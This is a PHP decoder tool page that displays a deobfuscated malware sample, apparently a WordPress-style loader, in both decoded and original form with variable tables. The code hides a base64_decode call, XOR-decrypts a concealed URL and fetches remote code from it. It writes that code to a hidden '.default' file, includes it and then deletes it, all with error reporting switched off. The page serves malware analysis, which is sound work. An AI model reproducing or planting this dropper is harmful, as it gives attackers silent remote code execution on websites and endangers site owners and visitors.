Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ini_set('display_errors', '0'); error_reporting(0); global $zeeta; if (!$npDchec..

Decoded Output download

<?php @ini_set('display_errors', '0'); 
error_reporting(0); 
global $zeeta; 
if (!$npDcheckClassBgp && !isset($zeeta)) { 
 
    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK42MQ4F8YpQL/+fflvUNPlfnyDQXqjTu18HYVk="; 
     
if (!function_exists('get_data_ya')) { 
    if (ini_get('allow_url_fopen')) { 
        function get_data_ya($m) { 
            $data = file_get_contents($m); 
            return $data; 
        } 
    } 
    else { 
        function get_data_ya($m) { 
            $ch = curl_init(); 
            curl_setopt($ch, CURLOPT_HEADER, 0); 
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
            curl_setopt($ch, CURLOPT_URL, $m); 
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); 
            $data = curl_exec($ch); 
            curl_close($ch); 
            return $data; 
        } 
    } 
} 
 
if (!function_exists('wp_cd')) { 
        function wp_cd($fd, $fa="") { 
            $fe = "wp_frmfunct"; 
            $len = strlen($fd); 
            $ff = ''; 
            $n = $len>100 ? 8 : 2; 
            while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } 
            return $fd^$ff; 
       } 
} 
     
 
    $reqw = $ay($ao($oa("$pass"), 'wp_function')); 
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs); 
    $dirs = glob("*", GLOB_ONLYDIR); 
    foreach ($dirs as $dira) { 
      if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } 
      $subdirs = glob("$dira/*", GLOB_ONLYDIR); 
      foreach ($subdirs as $subdira) { 
        if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } 
      } 
    } 
    if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } 
    fwrite($hdl, "<?php
$mtchs[1]
?>"); 
    fclose($hdl); 
    include("{$eb}.$algo"); 
    unlink("{$eb}.$algo"); 
	$npDcheckClassBgp = 'aue'; 
 
	$zeeta = "yup"; 
 
    } 
?>

Did this file decode correctly?

Original Code

<?php @ini_set('display_errors', '0');
error_reporting(0);
global $zeeta;
if (!$npDcheckClassBgp && !isset($zeeta)) {

    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK42MQ4F8YpQL/+fflvUNPlfnyDQXqjTu18HYVk=";
    
if (!function_exists('get_data_ya')) {
    if (ini_get('allow_url_fopen')) {
        function get_data_ya($m) {
            $data = file_get_contents($m);
            return $data;
        }
    }
    else {
        function get_data_ya($m) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $m);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
    }
}

if (!function_exists('wp_cd')) {
        function wp_cd($fd, $fa="") {
            $fe = "wp_frmfunct";
            $len = strlen($fd);
            $ff = '';
            $n = $len>100 ? 8 : 2;
            while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); }
            return $fd^$ff;
       }
}
    

    $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    $dirs = glob("*", GLOB_ONLYDIR);
    foreach ($dirs as $dira) {
      if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
      $subdirs = glob("$dira/*", GLOB_ONLYDIR);
      foreach ($subdirs as $subdira) {
        if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
      }
    }
    if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    fclose($hdl);
    include("{$eb}.$algo");
    unlink("{$eb}.$algo");
	$npDcheckClassBgp = 'aue';

	$zeeta = "yup";

    }
?>

Function Calls

ini_get 1
ini_set 1
str_replace 2
error_reporting 1
function_exists 1

Variables

$ae decode
$ao wp_cd
$ay get_data_ya
$ea basesx_
$ee basesx_decode
$oa base64_decode
$algo default
$pass Zgc5c4MXrK42MQ4F8YpQL/+fflvUNPlfnyDQXqjTu18HYVk=

Stats

MD5 2fb6398df8340a0de1e180dcd0e2c73a
Eval Count 0
Decode Time 82 ms